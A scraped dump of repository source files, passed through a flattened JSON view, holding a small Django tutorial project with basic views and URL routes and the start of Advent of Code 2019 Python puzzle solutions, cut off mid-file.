import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef selectfeature(Y_Feature,Num):\r\n abs_Y_Feature = abs(Y_Feature)\r\n # print('abs_Y_Feature = ',abs_Y_Feature)\r\n ind = np.argsort(-abs_Y_Feature)\r\n Y_Feature_reverse = abs_Y_Feature[np.argsort(-abs_Y_Feature)]\r\n count = 0\r\n for i in range(0,Num):\r\n if Y_Feature_reverse[i] > 0:\r\n count +=1\r\n else:\r\n break\r\n number = count\r\n index = ind[0:count]\r\n return number,index" }, { "alpha_fraction": 0.6645326614379883, "alphanum_fraction": 0.6875800490379333, "avg_line_length": 34.32558059692383, "blob_id": "80fa873ba97b70d30f6ac99435a780d0c9cd08f2", "content_id": "e207bb96c1d6d19bbacd15699464fd7896cd4d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/plot/evalu_result_plt.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nfrom mpl_toolkits.mplot3d import *\r\nfrom matplotlib import cm\r\n\r\nimport mpl_toolkits.mplot3d as p3d\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport pandas as pd\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nlabels = ['ACC', 'Macro-REC', 'Macro-PRE', 'Macro-F1', 'Macro-AUC']\r\nerKNN_path = 'evaluation_results.csv'\r\nerKNN = pd.read_csv(erKNN_path)\r\nprint(erKNN)\r\nPCA_erKNN = erKNN.iloc[:,1].tolist()\r\ngLPCA_erKNN = erKNN.iloc[:,2].tolist()\r\ngLSPCA_erKNN = erKNN.iloc[:,3].tolist()\r\nRgLPCA_erKNN = erKNN.iloc[:,4].tolist()\r\nSDSPCA_erKNN = erKNN.iloc[:,5].tolist()\r\nRLSDSPCA_erKNN = erKNN.iloc[:,6].tolist()\r\nx = np.arange(len(labels)) # the label locations\r\nwidth = 0.1 # the width of the bars\r\n\r\nplt.rc('font',family='Arial')\r\nfig, ax = plt.subplots()\r\nrects1 = ax.bar(x - width * 5/2, PCA_erKNN, width, label='PCA')\r\nrects2 = ax.bar(x - width * 3/2, gLPCA_erKNN, width, label='gLPCA')\r\nrects3 = ax.bar(x - width/2, gLSPCA_erKNN, width, 
label='gLSPCA')\r\nrects4 = ax.bar(x + width/2, RgLPCA_erKNN, width, label='RgLPCA')\r\nrects5 = ax.bar(x + width * 3/2, SDSPCA_erKNN, width, label='SDSPCA')\r\nrects6 = ax.bar(x + width * 5/2, RLSDSPCA_erKNN, width, label='RLSDSPCA')\r\n# Add some text for labels, title and custom x-axis tick labels, etc.\r\nax.set_xlabel('The average of five evaluation criteria')\r\nax.set_ylabel('Scores')\r\nax.set_xticks(x)\r\nax.set_xticklabels(labels)\r\nax.legend(loc='upper right',ncol=3,borderaxespad = 0.1)\r\nplt.ylim(0.5,1)\r\nplt.show()\r\n" }, { "alpha_fraction": 0.7523879408836365, "alphanum_fraction": 0.7553269863128662, "avg_line_length": 32.07500076293945, "blob_id": "47c7c9a5781ac3d6a94978f72ca0947ce72e0aa7", "content_id": "0341feb3dea115258729f603abba1807a3aad65e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1361, "license_type": "no_license", "max_line_length": 105, "num_lines": 40, "path": "/model/PCA.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef PCA_Algorithm(xMat,k):\r\n Z = -(xMat.T * xMat)\r\n # cal Q\r\n Z_eigVals, Z_eigVects = np.linalg.eig(Z)\r\n eigValIndice = np.argsort(Z_eigVals)\r\n n_eigValIndice = eigValIndice[0:k]\r\n n_Z_eigVect = Z_eigVects[:, n_eigValIndice]\r\n Q = np.array(n_Z_eigVect)\r\n qMat = np.mat(Q)\r\n # cal Y\r\n Y = xMat * qMat\r\n return Y\r\n\r\ndef cal_projections(X_data,k_d):\r\n Y= PCA_Algorithm(X_data.T, k_d)\r\n return Y" }, { "alpha_fraction": 0.6841359734535217, "alphanum_fraction": 0.7152974605560303, "avg_line_length": 24.148147583007812, "blob_id": "39f88bf3dd4969168cd6739138225671ed9d92a4", "content_id": "696f3a2e940ec5d49dd8809e7a0c013d9ca4e294", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 43, "num_lines": 27, "path": "/plot/box_plot_REC.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nfrom mpl_toolkits.mplot3d import *\r\nfrom matplotlib import cm\r\nimport mpl_toolkits.mplot3d as p3d\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport pandas as pd\r\nimport seaborn as sns\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nALLpath = 'recall_ALL.csv'\r\nALL = pd.read_csv(ALLpath)\r\nALL_er = ALL.iloc[:,[6,5,4,3,2,1]]\r\nprint(ALL_er)\r\nplt.rc('font', family='Arial')\r\nplt.figure()\r\nsns.set(style=\"whitegrid\")\r\nplot = sns.boxplot(data= ALL_er, 
width=0.7)\r\nyrange = np.arange(0,1.1,0.05)\r\nplt.yticks(yrange)\r\nplt.ylim(0.3,1)\r\nplt.xlabel('Methods')\r\nplt.ylabel('Macro-REC')\r\nfig = plot.get_figure()\r\nplt.show()\r\n" }, { "alpha_fraction": 0.5564558506011963, "alphanum_fraction": 0.5697856545448303, "avg_line_length": 29.636363983154297, "blob_id": "e246310d391d5db7b0dc6b4b09ca684b37fe2d82", "content_id": "36d75afa48ed6dac7579e8a43722455b7e5ee85f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3826, "license_type": "no_license", "max_line_length": 110, "num_lines": 121, "path": "/model/RgLPCA.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef rbf(dist, t):\r\n '''\r\n rbf kernel function\r\n '''\r\n return np.exp(-(dist / t))\r\n\r\ndef Eu_dis(x):\r\n \"\"\"\r\n Calculate the distance among each raw of x\r\n :param x: N X D\r\n N: the object number\r\n D: Dimension of the feature\r\n :return: N X N distance matrix\r\n \"\"\"\r\n x = np.mat(x)\r\n aa = np.sum(np.multiply(x, x), 1)\r\n ab = x * x.T\r\n dist_mat = aa + aa.T - 2 * ab\r\n dist_mat[dist_mat < 0] = 0\r\n dist_mat = np.sqrt(dist_mat)\r\n dist_mat = np.maximum(dist_mat, dist_mat.T)\r\n return dist_mat\r\n\r\ndef cal_rbf_dist(data, n_neighbors, t):\r\n dist = Eu_dis(data)\r\n n = dist.shape[0]\r\n # rbf_dist = rbf(dist, t)\r\n W_L = np.zeros((n, n))\r\n for i in range(n):\r\n index_L = np.argsort(dist[i, :])[1:1 + n_neighbors]\r\n len_index_L = len(index_L)\r\n for j in range(len_index_L):\r\n # W_L[i, index_L[j]] = rbf_dist[i, index_L[j]]\r\n W_L[i, index_L[j]] = 1\r\n # W_L = np.multiply(W_L, (W_L > W_L.transpose())) + np.multiply(W_L.transpose(), (W_L.transpose() >= W_L))\r\n W_L = np.maximum(W_L, W_L.transpose())\r\n return W_L\r\n\r\ndef cal_laplace(data):\r\n N = data.shape[0]\r\n H = np.zeros_like(data)\r\n for i in range(N):\r\n H[i, i] = np.sum(data[i])\r\n L = H - data # Laplacian\r\n return L\r\n\r\ndef RgLPCA_Algorithm(xMat,laplace,gamma,k):\r\n obj1 = 0\r\n obj2 = 0\r\n thresh = 1e-50\r\n E = np.ones((xMat.shape[0],xMat.shape[1]))\r\n E = np.mat(E)\r\n C = np.ones((xMat.shape[0],xMat.shape[1]))\r\n C = np.mat(C)\r\n laplace = np.mat(laplace)\r\n miu = 1\r\n for m in range(0, 10):\r\n Z = (-(miu/2) * ((E - xMat + C/miu).T * (E - xMat + C/miu))) + gamma * laplace\r\n # cal Q\r\n Z_eigVals, Z_eigVects = np.linalg.eig(np.mat(Z))\r\n eigValIndice = np.argsort(Z_eigVals)\r\n n_eigValIndice = eigValIndice[0:k]\r\n n_Z_eigVect = Z_eigVects[:, n_eigValIndice]\r\n Q = np.array(n_Z_eigVect)\r\n qMat = np.mat(Q)\r\n # 
cal Y\r\n        Y = (xMat - E - C/miu) * qMat\r\n        # cal A\r\n        A = xMat - Y * qMat.T - C/miu\r\n        # cal E (column-wise soft-thresholding; the shrinkage factor must be clamped at zero)\r\n        for i in range(E.shape[1]):\r\n            E[:,i] = max(1 - 1.0 / (miu * np.linalg.norm(A[:,i])), 0) * A[:,i]\r\n        # cal C\r\n        C = C + miu * (E - xMat + Y * qMat.T)\r\n        # cal miu\r\n        miu = 1.2 * miu\r\n\r\n        obj1 = np.linalg.norm(qMat)\r\n        if m > 0:\r\n            diff = obj2 - obj1\r\n            if diff < thresh:\r\n                break\r\n        obj2 = obj1\r\n    return Y\r\n\r\ndef cal_projections(X_data,k_d):\r\n    nclass = 4\r\n    n = len(X_data) # 500\r\n    # dist = Eu_dis(X_data)\r\n    # max_dist = np.max(dist)\r\n    # W_L = cal_rbf_dist(X_data, n_neighbors=9, t=max_dist)\r\n    W_L = cal_rbf_dist(X_data, n_neighbors=9, t=1)\r\n    R = W_L\r\n    M = cal_laplace(R)\r\n    Y = RgLPCA_Algorithm(X_data.transpose(), M, 1e2, k_d)\r\n    return Y" }, { "alpha_fraction": 0.6253017783164978, "alphanum_fraction": 0.6397875547409058, "avg_line_length": 30.390625, "blob_id": "4f1fdc7d4b3bca3c9a416c556c4c8287ef2a11bf", "content_id": "1ee794ee6fa43226dd40b3c800c0e76e6c6439a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2071, "license_type": "no_license", "max_line_length": 105, "num_lines": 64, "path": "/model/SDSPCA.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef SDSPCA_Algorithm(xMat,bMat,alpha,beta,k,c,n):\r\n    obj1 = 0\r\n    obj2 = 0\r\n    thresh = 1e-50\r\n    A = np.random.rand(c, k)\r\n    V = np.eye(n)\r\n    vMat = np.mat(V)\r\n    for m in range(0, 10):\r\n        Z = -(xMat.T * xMat) - (alpha * bMat.T * bMat) + beta * vMat\r\n        # cal Q\r\n        Z_eigVals, Z_eigVects = np.linalg.eig(np.mat(Z))\r\n        eigValIndice = np.argsort(Z_eigVals)\r\n        n_eigValIndice = eigValIndice[0:k]\r\n        n_Z_eigVect = Z_eigVects[:, n_eigValIndice]\r\n        Q = np.array(n_Z_eigVect)\r\n        # cal V\r\n        q = np.linalg.norm(Q, ord=2, axis=1)\r\n        qq = 1.0 / (q * 2)\r\n        VV = np.diag(qq)\r\n        vMat = np.mat(VV)\r\n        qMat = np.mat(Q)\r\n        # cal Y\r\n        Y = xMat * qMat\r\n        # cal A\r\n        A = bMat * qMat\r\n\r\n        obj1 = np.linalg.norm(qMat)\r\n        if m > 0:\r\n            diff = obj2 - obj1\r\n            if diff < thresh:\r\n                break\r\n        obj2 = obj1\r\n    return Y\r\n\r\ndef cal_projections(X_data,B_data,k_d):\r\n    nclass = 4\r\n    n = len(X_data)\r\n    Y = SDSPCA_Algorithm(X_data.transpose(), B_data.transpose(), 1e2, 0.5, k_d, nclass, n)\r\n    return Y" } ]
8
narayanmore/more
https://github.com/narayanmore/more
33f6cd592e75e0c06f50cfc19a0eebd7df1d02ca
c853be09a7200d3c25e9934b7071c79e0b3f6e22
3314928b8713f5ed414c9021870757ea611ecdb7
refs/heads/master
2023-08-04T16:49:20.820122
2021-09-08T04:32:05
2021-09-08T04:32:05
404,036,918
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7364864945411682, "alphanum_fraction": 0.75, "avg_line_length": 23.66666603088379, "blob_id": "c8ef9b03563f5377b2038cf61099293befcc54b9", "content_id": "203f8e2f144e04e04665a96325024bc887191c8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 56, "num_lines": 6, "path": "/naru3app/apps.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass Naru3AppConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'naru3app'\n" }, { "alpha_fraction": 0.7534722089767456, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 19.64285659790039, "blob_id": "906a19a3be38b779f0ea958d12b6b7b1ef8f7669", "content_id": "ba0f29965587fac7a36efafd3b62f13d4c87eb2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 288, "license_type": "no_license", "max_line_length": 53, "num_lines": 14, "path": "/naru3app/views.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\n@csrf_protect\n\n\ndef intro(request):\n s=\"hi am \"\n return HttpResponse(s)\n\n\ndef intro2(request):\n res=render(request,'naru3app/naru3app.html') \n return res" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 24.200000762939453, "blob_id": "85d23f3f9de6899cecf478845516c358199726c2", "content_id": "dfea39b604326620edd260187a7d4bbcd61cd26f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 53, "num_lines": 10, "path": "/naru4app/views.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\n@csrf_protect\n# Create your views here.\n\n\ndef info(request):\n res=render(request,'naru4app/naru4app.html')\n return res\n" }, { "alpha_fraction": 0.7254902124404907, "alphanum_fraction": 0.7352941036224365, "avg_line_length": 16.16666603088379, "blob_id": "1b0a47ff4c36efb4a3c992f6f45ab8273a47d842", "content_id": "85f9f331fd2c9bf93dce11f54b0cadca2d903f66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/naru4app/urls.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom naru4app import views\nurlpatterns=[\n path('info/',views.info),\n\n]" }, { "alpha_fraction": 0.6870229244232178, "alphanum_fraction": 0.7022900581359863, "avg_line_length": 17.85714340209961, "blob_id": "7368c961203ac4eca1c31ba6067f6102cb902ffe", "content_id": "137f2a244a0b8cabe457539c1252d7d5eaa497d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 131, "license_type": "no_license", "max_line_length": 31, "num_lines": 7, "path": "/naru3app/urls.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom naru3app import views\nurlpatterns=[\n path('intro/',views.intro),\n path('',views.intro2),\n\n]" }, { "alpha_fraction": 0.7280701994895935, "alphanum_fraction": 
0.7280701994895935, "avg_line_length": 15.428571701049805, "blob_id": "dadcc5a09cd4d5b2380e60ff8e8fda4a459e4f98", "content_id": "80af77666d53bc52bc1df4b65c960d252be68985", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 38, "num_lines": 7, "path": "/contact/urls.py", "repo_name": "narayanmore/more", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom contact import views\nurlpatterns=[\n path('contact/',views.funcontact),\n \n\n]" } ]
6
kp625544/chatbot-suchaku
https://github.com/kp625544/chatbot-suchaku
50616e43fb358cf0eb26584c622af4456a8850fc
280780b6e37857d9c00e0bef75389002b783ed01
0aca547294c64c641432ec6ac582c530da2f8383
refs/heads/master
2021-01-12T06:08:49.378934
2017-01-01T06:50:17
2017-01-01T06:50:17
77,316,822
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6094316840171814, "alphanum_fraction": 0.6275695562362671, "avg_line_length": 23.323530197143555, "blob_id": "37d2ca52ad77267994bbcac8d9c48cec0a56807e", "content_id": "3d9ece52a8668fcb5a82e8c11c6d2d19a18d4541", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 827, "license_type": "no_license", "max_line_length": 64, "num_lines": 34, "path": "/server.py", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "import aiml\nimport os\nimport socket\n\nbot = aiml.Kernel();\nbot.setBotPredicate('name', 'suchaku')\nbot.setBotPredicate('master', 'Hydra')\nbot.learn(\"std-startup.xml\")\nbot.respond(\"load aiml b\")\n\ns = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 4447 # Reserve a port for your service.\ns.bind((host, port)) # Bind to the port\n\ns.listen(5) # Now wait for client connection.\n\n\n\n\n#print os.system(\"nc -l -p 4444\")\n\nwhile 1:\n c, addr = s.accept() # Establish connection with client.\n print 'Got connection from', addr\n c.send('Thank you for connecting')\n while 1:\n data = c.recv(1024).decode(\"ascii\")\n #print bot.respond(data)\n c.send(bot.respond(data))\n\n\n\nc.close() # Close the connection\n" }, { "alpha_fraction": 0.5698529481887817, "alphanum_fraction": 0.59375, "avg_line_length": 24.904762268066406, "blob_id": "bbc1560dc5f0097e47f87edcec5b29f5cb410c47", "content_id": "9f016b0a5ef9d9646421ae54151b55bfa0afcc57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 544, "license_type": "no_license", "max_line_length": 86, "num_lines": 21, "path": "/client.py", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "#!/usr/bin/python # This is client.py file\n\nimport socket # Import socket module\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a socket object\nhost = socket.gethostname() # Get server ip\nport = 4447 # Reserve a port for your service.\n\ns.connect((host, port))\n\n#here the magic starts\n\nwhile True:\n print s.recv(1024)\n #s.send(raw_input(\"> \"))\n while 1:\n s.send(raw_input(\"> \").encode())\n print s.recv(1024)\n\n\ns.close() # Close the socket when done\n" }, { "alpha_fraction": 0.7288135886192322, "alphanum_fraction": 0.7559322118759155, "avg_line_length": 14.526315689086914, "blob_id": "f2d8ab4e14e46631a1bf03d04da2cbd40c989219", "content_id": "2f158c1020abf98f2dfa5e3aa61ae8ea19a7e342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 295, "license_type": "no_license", "max_line_length": 49, "num_lines": 19, "path": "/README.md", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "# chatbot-suchaku\n\n# A python 2.7 based ai bot\n\n#For downloading dependencies\n\nsudo python2.7 -m pip install -r requirements.txt\n\n#To start\n\nrun the server.py from the host\n\npython2.7 server.py\n\nrun the client.py from the client\n\npython2.7 client.py\n\ndon't forget to change the IP in the client\n" }, { "alpha_fraction": 0.5137676000595093, "alphanum_fraction": 0.7065144181251526, "avg_line_length": 15.920454978942871, "blob_id": "efb34f879ca157438ad5ad0a04c5ead57a4b16e4", "content_id": "2f253a06c9d42b2329b5a6630eaf172a7e9ae866", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1489, "license_type": "no_license", "max_line_length": 41, "num_lines": 88, "path": 
"/requirements.txt", "repo_name": "kp625544/chatbot-suchaku", "src_encoding": "UTF-8", "text": "adium-theme-ubuntu==0.3.4\naiml==0.8.6\nBabel==1.3\nbackports-abc==0.5\nbackports.shutil-get-terminal-size==1.0.0\nbeautifulsoup4==4.4.1\ncertifi==2016.9.26\nchardet==2.3.0\nclick==6.6\ncryptography==1.2.3\ndecorator==4.0.10\ndnspython==1.12.0\ndocutils==0.12\nenum34==1.1.6\nfeedparser==5.1.3\nFlask==0.12\nfuncsigs==0.4\ngdata==2.0.18\nhtml5lib==0.999\nidna==2.0\nipaddress==1.0.16\nipykernel==4.5.2\nipython==5.1.0\nipython-genutils==0.1.0\nitsdangerous==0.24\nJinja2==2.8\njupyter-client==4.4.0\njupyter-core==4.2.1\nknockpy==3.0\nlinecache2==1.0.0\nlxml==3.5.0\nMako==1.0.3\nMarkupSafe==0.23\nmock==1.3.0\npathlib2==2.1.0\npbr==1.8.0\npexpect==4.2.1\npickleshare==0.7.4\nPillow==3.1.2\nprompt-toolkit==1.0.9\npsutil==3.4.2\npsycopg2==2.6.1\nptyprocess==0.5.1\npyasn1==0.1.9\nPyAudio==0.2.8\nPyChart==1.39\npycrypto==2.6.1\npydot==1.0.29\npygeocoder==1.2.5\nPygments==2.1.3\npygobject==3.20.0\npyinotify==0.9.6\npyOpenSSL==0.15.1\npyparsing==2.0.3\npython-dateutil==2.4.2\npython-ldap==2.4.22\npython-openid==2.2.5\npython-stdnum==1.2\npyttsx==1.1\npytz==2014.10\nPyWebDAV==0.9.8\nPyYAML==3.11\npyzmq==16.0.2\nreportlab==3.3.0\nrequests==2.12.4\nroman==2.0.0\nsimplegeneric==0.8.1\nsimplejson==3.8.1\nsingledispatch==3.4.0.3\nsix==1.10.0\nSpeechRecognition==3.5.0\nstevedore==1.12.0\ntornado==4.4.2\ntraceback2==1.4.0\ntraitlets==4.3.1\nunittest2==1.1.0\nunity-lens-photos==1.0\nuTidylib==0.2\nvatnumber==1.2\nvirtualenv==15.0.1\nvirtualenv-clone==0.2.5\nvirtualenvwrapper==4.3.1\nvobject==0.8.1rc0\nwcwidth==0.1.7\nWerkzeug==0.11.11\nxlwt==0.7.5\nzenmap==7.1\nZSI==2.1a1\n" } ]
4
arturo8gll/adventOfCode2019
https://github.com/arturo8gll/adventOfCode2019
09685292377ec7c9e22eda83e454937ec0a0a2ae
ad3a035ab385d2f1e114f9eada20e25b06176d6a
e933e300e81d3560a20dbc07484bc110815f2d75
refs/heads/master
2020-09-22T14:36:23.290186
2019-12-05T06:12:53
2019-12-05T06:12:53
225,241,376
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40835580229759216, "alphanum_fraction": 0.44103774428367615, "avg_line_length": 23.941177368164062, "blob_id": "e526b6c896d4ea957589c3a852503755f477fbf3", "content_id": "0508c135d1d24084751905b9ff266417e1533c84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2968, "license_type": "no_license", "max_line_length": 69, "num_lines": 119, "path": "/day3/part1.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "def med(x):\n l,r,d,u=0,0,0,0\n\n for i in x:\n dir= i[0]\n val=int(i[1:])\n if dir == \"R\":\n # print(\"RIGHT\",val)\n r=r+val\n elif dir == \"L\":\n # print(\"LEFT\",val)\n l=l+val\n elif dir == \"U\":\n # print(\"UP\",val)\n u=u+val\n elif dir == \"D\":\n # print(\"DOWN\",val)\n d=d+val\n return l if l>r else r,d if d>u else u\ndef sum_ruta(x):\n l,r,d,u=0,0,0,0\n\n for i in x:\n dir= i[0]\n val=int(i[1:])\n if dir == \"R\":\n # print(\"RIGHT\",val)\n r=r+val\n elif dir == \"L\":\n # print(\"LEFT\",val)\n l=l+val\n elif dir == \"U\":\n # print(\"UP\",val)\n u=u+val\n elif dir == \"D\":\n # print(\"DOWN\",val)\n d=d+val\n return l+r+u+d\ndef sum_arr(x):\n cont=0\n for i in x:\n cont=cont+sum(i)\n return cont\ndef llenarRuta(ruta,arr,x,y):\n actual=[y,x].copy()\n for i in ruta:\n dir= i[0]\n val=int(i[1:])\n if dir == \"R\":\n # print(\"RIGHT\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[1]=actual[1]+1\n # print(actual)\n elif dir == \"L\":\n # print(\"LEFT\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[1]=actual[1]-1\n # print(actual)\n elif dir == \"U\":\n # print(\"UP\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[0]=actual[0]-1\n # print(actual)\n elif dir == \"D\":\n # print(\"DOWN\")\n for i in range(val):\n arr[actual[0]][actual[1]]=arr[actual[0]][actual[1]]+1\n actual[0]=actual[0]+1\n # print(actual)\n\n return actual\n\ndef print_mat(mat):\n for i in mat:\n print(i)\ndef manhatan(origen,final):\n return abs(origen[0]-final[0])+abs(origen[1]-final[1])\n\nf = open(\"input.txt\", \"r\")\n\nx,y=[i.strip().split(\",\") for i in f.readlines()]\n\n\nx1,x2=med(x),med(y)\n\n# print(x1,x2)\nx0=x1[0] if x1[0]>x2[0] else x2[0]\ny0=x1[1] if x1[1]>x2[1] else x2[1]\n\nprint(y0,x0)\n# arr = [[0 for i in range((x0*2)+2)] for j in range((y0*2)+2)]\n# print(len(arr),len(arr[0]))\n# print(\"ruta 1\",x0,y0)\n# llenarRuta(x,arr,x0,y0)\n# print(\"ruta 2\",x0,y0)\n# llenarRuta(y,arr,x0,y0)\n\n# print(sum_ruta(x),sum_ruta(y))\n\n#print(sum_arr(arr))\n\n# cont=[]\n# for i in range(len(arr)):\n # for j in range(len(arr[i])):\n # if arr[i][j]>1:\n # cont.append(i)\n # break\n# print(\"cruces\",cont)\n# print_mat(arr)\n# man_res=[]\n# for i in cont:\n # for j in range(len(arr[i])):\n # if arr[i][j]==2:\n # man_res.append(manhatan([x0,y0],[j,i]))\n\n# print(sorted(man_res))\n" }, { "alpha_fraction": 0.4988864064216614, "alphanum_fraction": 0.5478841662406921, "avg_line_length": 26.212121963500977, "blob_id": "9f907739bd123b20028c5c8541bb1d3c630399dd", "content_id": "d796aa47b1cbd3e407b971c5e4e10fa31f472e41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 65, "num_lines": 33, "path": "/day2/part2.py", "repo_name": "arturo8gll/adventOfCode2019", "src_encoding": "UTF-8", "text": "def gas(x1,x2,input):\n input=[int(x) for x in input]\n input[1]=x1\n 
